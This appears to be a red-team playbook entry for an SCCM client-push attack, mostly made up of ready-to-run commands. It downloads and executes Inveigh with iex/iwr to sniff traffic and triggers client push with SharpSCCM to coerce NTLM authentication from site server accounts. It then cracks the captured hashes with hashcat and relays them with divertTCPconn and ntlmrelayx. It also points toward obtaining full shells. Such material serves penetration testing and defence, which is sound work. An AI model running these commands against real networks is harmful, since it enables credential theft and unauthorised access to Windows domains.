ELEVATE-2 - Client Push
Document Reference
Description
It is possible to coerce NTLM authentication from a site servers push installation account and machine account. The NTLM authentication can either be cracked offline or relayed elsewhere for authentication.
Requirements
SCCM automatic site assignment and automatic client push installation are enabled
PKI certificates aren’t required for client authentication
SMB Signing disabled (If relaying authentication)
Domain user credentials
Local Administrator (If performing from Windows)
Fallback to NTLM authentication is not explicitly disabled (default)
Credential Capture
Setup capture
Setup Inveigh or Invoke-Inveigh to sniff for network traffic (Local Admin Required)
# Binary
Inveigh.exe
# Download
iex (iwr -usebasicparsing https://raw.githubusercontent.com/Kevin-Robertson/Inveigh/master/Inveigh.ps1)
# Execute
Invoke-Inveigh -ConsoleOutput Y -NBNS Y -mDNS Y -Proxy Y -HTTPS Y -IP [Local IP>
Trigger client push installation
Trigger the client push on the site server, targeting the listening host. This process may take a couple of minutes to capture
# SharpSCCM
SharpSCCM.exe invoke client-push -sms [SMS Site IP] -sc [Site Code] -t [Listening IP]

hashcat
hashcat.exe -m 5600 -a 0 -o hash.txt Wordlists\kaonashi14M.txt rules\best64.rule

Relay Authentication
ntlmrelayx Setup
Before setting up ntlmrelayx on Windows we need to divert SMB traffic on port 445 to an alternate port such as 8445 with divertTCPConn (Local Administrator Required)
divertTCPconn.exe 445 8445
Configure ntlmrelayx
ntlmrelayx.exe --smb-port 8445 -smb2support --smb-port 8445 -ts -t [Relay Target]
Trigger Push authentication then wait a minute or two to capture the authentication request.
SharpSCCM.exe invoke client-push -sms [Site Server] -sc [Site Code] -t [Relay IP]

Getting full shells on Windows
The below page demonstrates how to get full shells on Windows with Amnesiac and ntlmrelayx.
TAKEOVER-2Defensive IDs
Last updated